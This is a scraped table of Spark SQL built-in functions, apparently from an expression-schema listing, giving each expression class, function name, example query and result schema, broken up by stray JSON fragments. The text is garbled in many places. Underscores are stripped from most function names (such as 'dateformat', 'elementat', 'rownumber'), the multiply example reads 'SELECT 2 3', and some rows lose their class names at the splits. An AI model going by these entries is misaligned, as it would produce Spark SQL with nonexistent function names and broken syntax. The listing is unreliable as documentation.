org.apache.spark.sql.catalyst.expressions.DateDiff | datediff | SELECT datediff('2009-07-31', '2009-07-30') | struct<date_diff(2009-07-31, 2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DateDiff | datediff | SELECT datediff('2009-07-31', '2009-07-30') | struct<datediff(2009-07-31, 2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DateFormatClass | dateformat | SELECT dateformat('2016-04-08', 'y') | struct<date_format(2016-04-08, y):string> | | org.apache.spark.sql.catalyst.expressions.DateFromUnixDate | datefromunixdate | SELECT datefromunixdate(1) | struct<datefromunix_date(1):date> | | org.apache.spark.sql.catalyst.expressions.DatePartExpressionBuilder | datepart | SELECT datepart('YEAR', TIMESTAMP '2019-08-12 01:00:00.123456') | struct<date_part(YEAR, TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.DatePartExpressionBuilder | datepart | SELECT datepart('YEAR', TIMESTAMP '2019-08-12 01:00:00.123456') | struct<datepart(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.DateSub | datesub | SELECT datesub('2016-07-30', 1) | struct<date_sub(2016-07-30, 1):date> | | org.apache.spark.sql.catalyst.expressions.DayName | dayname | SELECT dayname(DATE('2008-02-20')) | struct<dayname(2008-02-20):string> | | 
org.apache.spark.sql.catalyst.expressions.DayOfMonth | day | SELECT day('2009-07-30') | struct<day(2009-07-30):int> | |" }, { "data": "| dayofmonth | SELECT dayofmonth('2009-07-30') | struct<dayofmonth(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DayOfWeek | dayofweek | SELECT dayofweek('2009-07-30') | struct<dayofweek(2009-07-30):int> | | org.apache.spark.sql.catalyst.expressions.DayOfYear | dayofyear | SELECT dayofyear('2016-04-09') | struct<dayofyear(2016-04-09):int> | | org.apache.spark.sql.catalyst.expressions.Decode | decode | SELECT decode(encode('abc', 'utf-8'), 'utf-8') | struct<decode(encode(abc, utf-8), utf-8):string> | | org.apache.spark.sql.catalyst.expressions.DenseRank | denserank | SELECT a, b, denserank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,DENSE_RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.Divide | / | SELECT 3 / 2 | struct<(3 / 2):double> | | org.apache.spark.sql.catalyst.expressions.ElementAt | elementat | SELECT elementat(array(1, 2, 3), 2) | struct<element_at(array(1, 2, 3), 2):int> | | org.apache.spark.sql.catalyst.expressions.Elt | elt | SELECT elt(1, 'scala', 'java') | struct<elt(1, scala, java):string> | | org.apache.spark.sql.catalyst.expressions.Encode | encode | SELECT encode('abc', 'utf-8') | struct<encode(abc, utf-8):binary> | | org.apache.spark.sql.catalyst.expressions.EndsWithExpressionBuilder | endswith | SELECT endswith('Spark SQL', 'SQL') | struct<endswith(Spark SQL, SQL):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualNull | equalnull | SELECT equalnull(3, 3) | struct<equal_null(3, 3):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualNullSafe | <=> | SELECT 2 <=> 2 | struct<(2 <=> 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualTo | = | SELECT 2 = 2 | struct<(2 = 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EqualTo | == | SELECT 2 == 2 | struct<(2 = 2):boolean> | | org.apache.spark.sql.catalyst.expressions.EulerNumber | e | SELECT e() | struct<E():double> | | org.apache.spark.sql.catalyst.expressions.Exp | exp | SELECT exp(0) | struct<EXP(0):double> | | org.apache.spark.sql.catalyst.expressions.ExplodeExpressionBuilder | explode | SELECT explode(array(10, 20)) | struct<col:int> | | org.apache.spark.sql.catalyst.expressions.ExplodeExpressionBuilder | explodeouter | SELECT explodeouter(array(10, 20)) | struct<col:int> | | org.apache.spark.sql.catalyst.expressions.Expm1 | expm1 | SELECT expm1(0) | struct<EXPM1(0):double> | | org.apache.spark.sql.catalyst.expressions.Extract | extract | SELECT extract(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456') | struct<extract(YEAR FROM TIMESTAMP '2019-08-12 01:00:00.123456'):int> | | org.apache.spark.sql.catalyst.expressions.Factorial | factorial | SELECT factorial(5) | struct<factorial(5):bigint> | | org.apache.spark.sql.catalyst.expressions.FindInSet | findinset | SELECT findinset('ab','abc,b,ab,c,def') | struct<findinset(ab, abc,b,ab,c,def):int> | | org.apache.spark.sql.catalyst.expressions.Flatten | flatten | SELECT flatten(array(array(1, 2), array(3, 4))) | struct<flatten(array(array(1, 2), array(3, 4))):array<int>> | | org.apache.spark.sql.catalyst.expressions.FloorExpressionBuilder | floor | SELECT floor(-0.1) | struct<FLOOR(-0.1):decimal(1,0)> | | org.apache.spark.sql.catalyst.expressions.FormatNumber | formatnumber | SELECT 
formatnumber(12332.123456, 4) | struct<format_number(12332.123456, 4):string> | | org.apache.spark.sql.catalyst.expressions.FormatString | formatstring | SELECT formatstring(\"Hello World %d %s\", 100, \"days\") | struct<format_string(Hello World %d %s, 100, days):string> | | org.apache.spark.sql.catalyst.expressions.FormatString | printf | SELECT printf(\"Hello World %d %s\", 100, \"days\") | struct<printf(Hello World %d %s, 100, days):string> | | org.apache.spark.sql.catalyst.expressions.FromUTCTimestamp | fromutctimestamp | SELECT fromutctimestamp('2016-08-31', 'Asia/Seoul') | struct<fromutctimestamp(2016-08-31, Asia/Seoul):timestamp> | | org.apache.spark.sql.catalyst.expressions.FromUnixTime | fromunixtime | SELECT fromunixtime(0, 'yyyy-MM-dd HH:mm:ss') | struct<from_unixtime(0, yyyy-MM-dd HH:mm:ss):string> | | org.apache.spark.sql.catalyst.expressions.Get | get | SELECT get(array(1, 2, 3), 0) | struct<get(array(1, 2, 3), 0):int> | | org.apache.spark.sql.catalyst.expressions.GetJsonObject | getjsonobject | SELECT getjsonobject('{\"a\":\"b\"}', '$.a') | struct<getjsonobject({\"a\":\"b\"}, $.a):string> | | org.apache.spark.sql.catalyst.expressions.GreaterThan | > | SELECT 2 > 1 | struct<(2 > 1):boolean> | | org.apache.spark.sql.catalyst.expressions.GreaterThanOrEqual | >= | SELECT 2 >= 1 | struct<(2 >= 1):boolean> | | org.apache.spark.sql.catalyst.expressions.Greatest | greatest | SELECT greatest(10, 9, 2, 4, 3) | struct<greatest(10, 9, 2, 4, 3):int> | | org.apache.spark.sql.catalyst.expressions.Grouping | grouping | SELECT name, grouping(name), sum(age) FROM VALUES (2, 'Alice'), (5, 'Bob') people(age, name) GROUP BY cube(name) | struct<name:string,grouping(name):tinyint,sum(age):bigint> | | org.apache.spark.sql.catalyst.expressions.GroupingID | groupingid | SELECT name, groupingid(), sum(age), avg(height) FROM VALUES (2, 'Alice', 165), (5, 'Bob', 180) people(age, name, height) GROUP BY cube(name, height) | struct<name:string,grouping_id():bigint,sum(age):bigint,avg(height):double> | | org.apache.spark.sql.catalyst.expressions.Hex | hex | SELECT hex(17) | struct<hex(17):string> | | org.apache.spark.sql.catalyst.expressions.HllSketchEstimate | hllsketchestimate | SELECT hllsketchestimate(hllsketchagg(col)) FROM VALUES (1), (1), (2), (2), (3) tab(col) | struct<hllsketchestimate(hllsketchagg(col, 12)):bigint> | |" }, { "data": "| hllunion | SELECT hllsketchestimate(hllunion(hllsketchagg(col1), hllsketchagg(col2))) FROM VALUES (1, 4), (1, 4), (2, 5), (2, 5), (3, 6) tab(col1, col2) | struct<hllsketchestimate(hllunion(hllsketchagg(col1, 12), hllsketch_agg(col2, 12), false)):bigint> | | org.apache.spark.sql.catalyst.expressions.Hour | hour | SELECT hour('2009-07-30 12:58:59') | struct<hour(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.Hypot | hypot | SELECT hypot(3, 4) | struct<HYPOT(3, 4):double> | | org.apache.spark.sql.catalyst.expressions.ILike | ilike | SELECT ilike('Spark', 'Park') | struct<ilike(Spark, Park):boolean> | | org.apache.spark.sql.catalyst.expressions.If | if | SELECT if(1 < 2, 'a', 'b') | struct<(IF((1 < 2), a, b)):string> | | org.apache.spark.sql.catalyst.expressions.In | in | SELECT 1 in(1, 2, 3) | struct<(1 IN (1, 2, 3)):boolean> | | org.apache.spark.sql.catalyst.expressions.InitCap | initcap | SELECT initcap('sPark sql') | struct<initcap(sPark sql):string> | | org.apache.spark.sql.catalyst.expressions.Inline | inline | SELECT inline(array(struct(1, 'a'), struct(2, 'b'))) | struct<col1:int,col2:string> | | 
org.apache.spark.sql.catalyst.expressions.Inline | inlineouter | SELECT inlineouter(array(struct(1, 'a'), struct(2, 'b'))) | struct<col1:int,col2:string> | | org.apache.spark.sql.catalyst.expressions.InputFileBlockLength | inputfileblocklength | SELECT inputfileblocklength() | struct<inputfileblock_length():bigint> | | org.apache.spark.sql.catalyst.expressions.InputFileBlockStart | inputfileblockstart | SELECT inputfileblockstart() | struct<inputfileblock_start():bigint> | | org.apache.spark.sql.catalyst.expressions.InputFileName | inputfilename | SELECT inputfilename() | struct<inputfilename():string> | | org.apache.spark.sql.catalyst.expressions.IntegralDivide | div | SELECT 3 div 2 | struct<(3 div 2):bigint> | | org.apache.spark.sql.catalyst.expressions.IsNaN | isnan | SELECT isnan(cast('NaN' as double)) | struct<isnan(CAST(NaN AS DOUBLE)):boolean> | | org.apache.spark.sql.catalyst.expressions.IsNotNull | isnotnull | SELECT isnotnull(1) | struct<(1 IS NOT NULL):boolean> | | org.apache.spark.sql.catalyst.expressions.IsNull | isnull | SELECT isnull(1) | struct<(1 IS NULL):boolean> | | org.apache.spark.sql.catalyst.expressions.JsonObjectKeys | jsonobjectkeys | SELECT jsonobjectkeys('{}') | struct<jsonobjectkeys({}):array<string>> | | org.apache.spark.sql.catalyst.expressions.JsonToStructs | fromjson | SELECT fromjson('{\"a\":1, \"b\":0.8}', 'a INT, b DOUBLE') | struct<from_json({\"a\":1, \"b\":0.8}):struct<a:int,b:double>> | | org.apache.spark.sql.catalyst.expressions.JsonTuple | jsontuple | SELECT jsontuple('{\"a\":1, \"b\":2}', 'a', 'b') | struct<c0:string,c1:string> | | org.apache.spark.sql.catalyst.expressions.LPadExpressionBuilder | lpad | SELECT lpad('hi', 5, '??') | struct<lpad(hi, 5, ??):string> | | org.apache.spark.sql.catalyst.expressions.Lag | lag | SELECT a, b, lag(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,lag(b, 1, NULL) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN -1 FOLLOWING AND -1 FOLLOWING):int> | | org.apache.spark.sql.catalyst.expressions.LastDay | lastday | SELECT lastday('2009-01-12') | struct<last_day(2009-01-12):date> | | org.apache.spark.sql.catalyst.expressions.Lead | lead | SELECT a, b, lead(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,lead(b, 1, NULL) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN 1 FOLLOWING AND 1 FOLLOWING):int> | | org.apache.spark.sql.catalyst.expressions.Least | least | SELECT least(10, 9, 2, 4, 3) | struct<least(10, 9, 2, 4, 3):int> | | org.apache.spark.sql.catalyst.expressions.Left | left | SELECT left('Spark SQL', 3) | struct<left(Spark SQL, 3):string> | | org.apache.spark.sql.catalyst.expressions.Length | charlength | SELECT charlength('Spark SQL ') | struct<char_length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | characterlength | SELECT characterlength('Spark SQL ') | struct<character_length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | len | SELECT len('Spark SQL ') | struct<len(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.Length | length | SELECT length('Spark SQL ') | struct<length(Spark SQL ):int> | | org.apache.spark.sql.catalyst.expressions.LengthOfJsonArray | jsonarraylength | SELECT jsonarraylength('[1,2,3,4]') | struct<jsonarraylength([1,2,3,4]):int> | | org.apache.spark.sql.catalyst.expressions.LessThan | < | SELECT 1 < 2 | struct<(1 < 2):boolean> | | 
org.apache.spark.sql.catalyst.expressions.LessThanOrEqual | <= | SELECT 2 <= 2 | struct<(2 <= 2):boolean> | | org.apache.spark.sql.catalyst.expressions.Levenshtein | levenshtein | SELECT levenshtein('kitten', 'sitting') | struct<levenshtein(kitten, sitting):int> | | org.apache.spark.sql.catalyst.expressions.Like | like | SELECT like('Spark', 'park') | struct<Spark LIKE park:boolean> | | org.apache.spark.sql.catalyst.expressions.LocalTimestamp | localtimestamp | SELECT localtimestamp() | struct<localtimestamp():timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.Log | ln | SELECT ln(1) | struct<ln(1):double> | | org.apache.spark.sql.catalyst.expressions.Log10 | log10 | SELECT log10(10) | struct<LOG10(10):double> | | org.apache.spark.sql.catalyst.expressions.Log1p | log1p | SELECT log1p(0) | struct<LOG1P(0):double> | | org.apache.spark.sql.catalyst.expressions.Log2 | log2 | SELECT log2(2) | struct<LOG2(2):double> | |" }, { "data": "| log | SELECT log(10, 100) | struct<LOG(10, 100):double> | | org.apache.spark.sql.catalyst.expressions.Lower | lcase | SELECT lcase('SparkSql') | struct<lcase(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Lower | lower | SELECT lower('SparkSql') | struct<lower(SparkSql):string> | | org.apache.spark.sql.catalyst.expressions.Luhncheck | luhncheck | SELECT luhncheck('8112189876') | struct<luhn_check(8112189876):boolean> | | org.apache.spark.sql.catalyst.expressions.MakeDTInterval | makedtinterval | SELECT makedtinterval(1, 12, 30, 01.001001) | struct<makedtinterval(1, 12, 30, 1.001001):interval day to second> | | org.apache.spark.sql.catalyst.expressions.MakeDate | makedate | SELECT makedate(2013, 7, 15) | struct<make_date(2013, 7, 15):date> | | org.apache.spark.sql.catalyst.expressions.MakeInterval | makeinterval | SELECT makeinterval(100, 11, 1, 1, 12, 30, 01.001001) | struct<make_interval(100, 11, 1, 1, 12, 30, 1.001001):interval> | | org.apache.spark.sql.catalyst.expressions.MakeTimestamp | maketimestamp | SELECT maketimestamp(2014, 12, 28, 6, 30, 45.887) | struct<make_timestamp(2014, 12, 28, 6, 30, 45.887):timestamp> | | org.apache.spark.sql.catalyst.expressions.MakeTimestampLTZExpressionBuilder | maketimestampltz | SELECT maketimestampltz(2014, 12, 28, 6, 30, 45.887) | struct<maketimestampltz(2014, 12, 28, 6, 30, 45.887):timestamp> | | org.apache.spark.sql.catalyst.expressions.MakeTimestampNTZExpressionBuilder | maketimestampntz | SELECT maketimestampntz(2014, 12, 28, 6, 30, 45.887) | struct<maketimestampntz(2014, 12, 28, 6, 30, 45.887):timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.MakeYMInterval | makeyminterval | SELECT makeyminterval(1, 2) | struct<makeyminterval(1, 2):interval year to month> | | org.apache.spark.sql.catalyst.expressions.MapConcat | mapconcat | SELECT mapconcat(map(1, 'a', 2, 'b'), map(3, 'c')) | struct<map_concat(map(1, a, 2, b), map(3, c)):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MapContainsKey | mapcontainskey | SELECT mapcontainskey(map(1, 'a', 2, 'b'), 1) | struct<mapcontainskey(map(1, a, 2, b), 1):boolean> | | org.apache.spark.sql.catalyst.expressions.MapEntries | mapentries | SELECT mapentries(map(1, 'a', 2, 'b')) | struct<map_entries(map(1, a, 2, b)):array<struct<key:int,value:string>>> | | org.apache.spark.sql.catalyst.expressions.MapFilter | mapfilter | SELECT mapfilter(map(1, 0, 2, 2, 3, -1), (k, v) -> k > v) | struct<map_filter(map(1, 0, 2, 2, 3, -1), lambdafunction((namedlambdavariable() > namedlambdavariable()), namedlambdavariable(), 
namedlambdavariable())):map<int,int>> | | org.apache.spark.sql.catalyst.expressions.MapFromArrays | mapfromarrays | SELECT mapfromarrays(array(1.0, 3.0), array('2', '4')) | struct<mapfromarrays(array(1.0, 3.0), array(2, 4)):map<decimal(2,1),string>> | | org.apache.spark.sql.catalyst.expressions.MapFromEntries | mapfromentries | SELECT mapfromentries(array(struct(1, 'a'), struct(2, 'b'))) | struct<mapfromentries(array(struct(1, a), struct(2, b))):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MapKeys | mapkeys | SELECT mapkeys(map(1, 'a', 2, 'b')) | struct<map_keys(map(1, a, 2, b)):array<int>> | | org.apache.spark.sql.catalyst.expressions.MapValues | mapvalues | SELECT mapvalues(map(1, 'a', 2, 'b')) | struct<map_values(map(1, a, 2, b)):array<string>> | | org.apache.spark.sql.catalyst.expressions.MapZipWith | mapzipwith | SELECT mapzipwith(map(1, 'a', 2, 'b'), map(1, 'x', 2, 'y'), (k, v1, v2) -> concat(v1, v2)) | struct<mapzipwith(map(1, a, 2, b), map(1, x, 2, y), lambdafunction(concat(namedlambdavariable(), namedlambdavariable()), namedlambdavariable(), namedlambdavariable(), namedlambdavariable())):map<int,string>> | | org.apache.spark.sql.catalyst.expressions.MaskExpressionBuilder | mask | SELECT mask('abcd-EFGH-8765-4321') | struct<mask(abcd-EFGH-8765-4321, X, x, n, NULL):string> | | org.apache.spark.sql.catalyst.expressions.Md5 | md5 | SELECT md5('Spark') | struct<md5(Spark):string> | | org.apache.spark.sql.catalyst.expressions.MicrosToTimestamp | timestampmicros | SELECT timestampmicros(1230219000123123) | struct<timestamp_micros(1230219000123123):timestamp> | | org.apache.spark.sql.catalyst.expressions.MillisToTimestamp | timestampmillis | SELECT timestampmillis(1230219000123) | struct<timestamp_millis(1230219000123):timestamp> | | org.apache.spark.sql.catalyst.expressions.Minute | minute | SELECT minute('2009-07-30 12:58:59') | struct<minute(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.MonotonicallyIncreasingID | monotonicallyincreasingid | SELECT monotonicallyincreasingid() | struct<monotonicallyincreasingid():bigint> | | org.apache.spark.sql.catalyst.expressions.Month | month | SELECT month('2016-07-30') | struct<month(2016-07-30):int> | | org.apache.spark.sql.catalyst.expressions.MonthName | monthname | SELECT monthname('2008-02-20') | struct<monthname(2008-02-20):string> | | org.apache.spark.sql.catalyst.expressions.MonthsBetween | monthsbetween | SELECT monthsbetween('1997-02-28 10:30:00', '1996-10-30') | struct<months_between(1997-02-28 10:30:00, 1996-10-30, true):double> | | org.apache.spark.sql.catalyst.expressions.Multiply | | SELECT 2 3 | struct<(2 * 3):int> | | org.apache.spark.sql.catalyst.expressions.Murmur3Hash | hash | SELECT hash('Spark', array(123), 2) | struct<hash(Spark, array(123), 2):int> | | org.apache.spark.sql.catalyst.expressions.NTile | ntile | SELECT a, b, ntile(2) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,ntile(2) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.NaNvl | nanvl | SELECT nanvl(cast('NaN' as double), 123) | struct<nanvl(CAST(NaN AS DOUBLE), 123):double> | | org.apache.spark.sql.catalyst.expressions.NextDay | nextday | SELECT nextday('2015-01-14', 'TU') | struct<next_day(2015-01-14, TU):date> | | org.apache.spark.sql.catalyst.expressions.Not | ! | SELECT ! 
true | struct<(NOT true):boolean> | | org.apache.spark.sql.catalyst.expressions.Not | not | SELECT not true | struct<(NOT true):boolean> | |" }, { "data": "| now | SELECT now() | struct<now():timestamp> | | org.apache.spark.sql.catalyst.expressions.NthValue | nthvalue | SELECT a, b, nthvalue(b, 2) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,nth_value(b, 2) OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.NullIf | nullif | SELECT nullif(2, 2) | struct<nullif(2, 2):int> | | org.apache.spark.sql.catalyst.expressions.Nvl | ifnull | SELECT ifnull(NULL, array('2')) | struct<ifnull(NULL, array(2)):array<string>> | | org.apache.spark.sql.catalyst.expressions.Nvl | nvl | SELECT nvl(NULL, array('2')) | struct<nvl(NULL, array(2)):array<string>> | | org.apache.spark.sql.catalyst.expressions.Nvl2 | nvl2 | SELECT nvl2(NULL, 2, 1) | struct<nvl2(NULL, 2, 1):int> | | org.apache.spark.sql.catalyst.expressions.OctetLength | octetlength | SELECT octetlength('Spark SQL') | struct<octet_length(Spark SQL):int> | | org.apache.spark.sql.catalyst.expressions.Or | or | SELECT true or false | struct<(true OR false):boolean> | | org.apache.spark.sql.catalyst.expressions.Overlay | overlay | SELECT overlay('Spark SQL' PLACING '' FROM 6) | struct<overlay(Spark SQL, , 6, -1):string> | | org.apache.spark.sql.catalyst.expressions.ParseToDate | todate | SELECT todate('2009-07-30 04:17:52') | struct<to_date(2009-07-30 04:17:52):date> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestamp | totimestamp | SELECT totimestamp('2016-12-31 00:12:00') | struct<to_timestamp(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestampLTZExpressionBuilder | totimestampltz | SELECT totimestampltz('2016-12-31 00:12:00') | struct<totimestampltz(2016-12-31 00:12:00):timestamp> | | org.apache.spark.sql.catalyst.expressions.ParseToTimestampNTZExpressionBuilder | totimestampntz | SELECT totimestampntz('2016-12-31 00:12:00') | struct<totimestampntz(2016-12-31 00:12:00):timestamp_ntz> | | org.apache.spark.sql.catalyst.expressions.ParseUrl | parseurl | SELECT parseurl('http://spark.apache.org/path?query=1', 'HOST') | struct<parse_url(http://spark.apache.org/path?query=1, HOST):string> | | org.apache.spark.sql.catalyst.expressions.PercentRank | percentrank | SELECT a, b, percentrank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,PERCENT_RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):double> | | org.apache.spark.sql.catalyst.expressions.Pi | pi | SELECT pi() | struct<PI():double> | | org.apache.spark.sql.catalyst.expressions.Pmod | pmod | SELECT pmod(10, 3) | struct<pmod(10, 3):int> | | org.apache.spark.sql.catalyst.expressions.PosExplode | posexplode | SELECT posexplode(array(10,20)) | struct<pos:int,col:int> | | org.apache.spark.sql.catalyst.expressions.PosExplode | posexplodeouter | SELECT posexplodeouter(array(10,20)) | struct<pos:int,col:int> | | org.apache.spark.sql.catalyst.expressions.Pow | pow | SELECT pow(2, 3) | struct<pow(2, 3):double> | | org.apache.spark.sql.catalyst.expressions.Pow | power | SELECT power(2, 3) | struct<POWER(2, 3):double> | | org.apache.spark.sql.catalyst.expressions.Quarter | quarter | SELECT quarter('2016-08-31') | struct<quarter(2016-08-31):int> | | 
org.apache.spark.sql.catalyst.expressions.RLike | regexp | SELECT regexp('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<REGEXP(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RLike | regexplike | SELECT regexplike('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<REGEXP_LIKE(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RLike | rlike | SELECT rlike('%SystemDrive%\\Users\\John', '%SystemDrive%\\\\Users.') | struct<RLIKE(%SystemDrive%UsersJohn, %SystemDrive%\\Users.):boolean> | | org.apache.spark.sql.catalyst.expressions.RPadExpressionBuilder | rpad | SELECT rpad('hi', 5, '??') | struct<rpad(hi, 5, ??):string> | | org.apache.spark.sql.catalyst.expressions.RaiseErrorExpressionBuilder | raiseerror | SELECT raiseerror('custom error message') | struct<raiseerror(USERRAISED_EXCEPTION, map(errorMessage, custom error message)):void> | | org.apache.spark.sql.catalyst.expressions.Rand | rand | SELECT rand() | struct<rand():double> | | org.apache.spark.sql.catalyst.expressions.Rand | random | SELECT random() | struct<rand():double> | | org.apache.spark.sql.catalyst.expressions.Randn | randn | SELECT randn() | struct<randn():double> | | org.apache.spark.sql.catalyst.expressions.Rank | rank | SELECT a, b, rank(b) OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,RANK() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.RegExpCount | regexpcount | SELECT regexpcount('Steven Jones and Stephen Smith are the best players', 'Ste(v&#124;ph)en') | struct<regexp_count(Steven Jones and Stephen Smith are the best players, Ste(v&#124;ph)en):int> | | org.apache.spark.sql.catalyst.expressions.RegExpExtract | regexpextract | SELECT regexpextract('100-200', '(\\\\d+)-(\\\\d+)', 1) | struct<regexp_extract(100-200, (\\d+)-(\\d+), 1):string> | | org.apache.spark.sql.catalyst.expressions.RegExpExtractAll | regexpextractall | SELECT regexpextractall('100-200, 300-400', '(\\\\d+)-(\\\\d+)', 1) | struct<regexpextractall(100-200, 300-400, (\\d+)-(\\d+), 1):array<string>> | | org.apache.spark.sql.catalyst.expressions.RegExpInStr | regexpinstr | SELECT regexpinstr(r\"\\abc\", r\"^\\\\abc$\") | struct<regexp_instr(\\abc, ^\\\\abc$, 0):int> | | org.apache.spark.sql.catalyst.expressions.RegExpReplace | regexpreplace | SELECT regexpreplace('100-200', '(\\\\d+)', 'num') | struct<regexp_replace(100-200, (\\d+), num, 1):string> | |" }, { "data": "| regexpsubstr | SELECT regexpsubstr('Steven Jones and Stephen Smith are the best players', 'Ste(v&#124;ph)en') | struct<regexp_substr(Steven Jones and Stephen Smith are the best players, Ste(v&#124;ph)en):string> | | org.apache.spark.sql.catalyst.expressions.Remainder | % | SELECT 2 % 1.8 | struct<(2 % 1.8):decimal(2,1)> | | org.apache.spark.sql.catalyst.expressions.Remainder | mod | SELECT 2 % 1.8 | struct<(2 % 1.8):decimal(2,1)> | | org.apache.spark.sql.catalyst.expressions.Reverse | reverse | SELECT reverse('Spark SQL') | struct<reverse(Spark SQL):string> | | org.apache.spark.sql.catalyst.expressions.Right | right | SELECT right('Spark SQL', 3) | struct<right(Spark SQL, 3):string> | | org.apache.spark.sql.catalyst.expressions.Rint | rint | SELECT rint(12.3456) | struct<rint(12.3456):double> | | org.apache.spark.sql.catalyst.expressions.Round | round | SELECT round(2.5, 0) | 
struct<round(2.5, 0):decimal(2,0)> | | org.apache.spark.sql.catalyst.expressions.RowNumber | rownumber | SELECT a, b, rownumber() OVER (PARTITION BY a ORDER BY b) FROM VALUES ('A1', 2), ('A1', 1), ('A2', 3), ('A1', 1) tab(a, b) | struct<a:string,b:int,row_number() OVER (PARTITION BY a ORDER BY b ASC NULLS FIRST ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW):int> | | org.apache.spark.sql.catalyst.expressions.SchemaOfCsv | schemaofcsv | SELECT schemaofcsv('1,abc') | struct<schemaofcsv(1,abc):string> | | org.apache.spark.sql.catalyst.expressions.SchemaOfJson | schemaofjson | SELECT schemaofjson('[{\"col\":0}]') | struct<schemaofjson([{\"col\":0}]):string> | | org.apache.spark.sql.catalyst.expressions.SchemaOfXml | schemaofxml | SELECT schemaofxml('<p><a>1</a></p>') | struct<schemaofxml(<p><a>1</a></p>):string> | | org.apache.spark.sql.catalyst.expressions.Sec | sec | SELECT sec(0) | struct<SEC(0):double> | | org.apache.spark.sql.catalyst.expressions.Second | second | SELECT second('2009-07-30 12:58:59') | struct<second(2009-07-30 12:58:59):int> | | org.apache.spark.sql.catalyst.expressions.SecondsToTimestamp | timestampseconds | SELECT timestampseconds(1230219000) | struct<timestamp_seconds(1230219000):timestamp> | | org.apache.spark.sql.catalyst.expressions.Sentences | sentences | SELECT sentences('Hi there! Good morning.') | struct<sentences(Hi there! Good morning., , ):array<array<string>>> | | org.apache.spark.sql.catalyst.expressions.Sequence | sequence | SELECT sequence(1, 5) | struct<sequence(1, 5):array<int>> | | org.apache.spark.sql.catalyst.expressions.SessionWindow | sessionwindow | SELECT a, sessionwindow.start, sessionwindow.end, count(*) as cnt FROM VALUES ('A1', '2021-01-01 00:00:00'), ('A1', '2021-01-01 00:04:30'), ('A1', '2021-01-01 00:10:00'), ('A2', '2021-01-01 00:01:00') AS tab(a, b) GROUP by a, sessionwindow(b, '5 minutes') ORDER BY a, start | struct<a:string,start:timestamp,end:timestamp,cnt:bigint> | | org.apache.spark.sql.catalyst.expressions.Sha1 | sha | SELECT sha('Spark') | struct<sha(Spark):string> | | org.apache.spark.sql.catalyst.expressions.Sha1 | sha1 | SELECT sha1('Spark') | struct<sha1(Spark):string> | | org.apache.spark.sql.catalyst.expressions.Sha2 | sha2 | SELECT sha2('Spark', 256) | struct<sha2(Spark, 256):string> | | org.apache.spark.sql.catalyst.expressions.ShiftLeft | shiftleft | SELECT shiftleft(2, 1) | struct<shiftleft(2, 1):int> | | org.apache.spark.sql.catalyst.expressions.ShiftRight | shiftright | SELECT shiftright(4, 1) | struct<shiftright(4, 1):int> | | org.apache.spark.sql.catalyst.expressions.ShiftRightUnsigned | shiftrightunsigned | SELECT shiftrightunsigned(4, 1) | struct<shiftrightunsigned(4, 1):int> | | org.apache.spark.sql.catalyst.expressions.Shuffle | 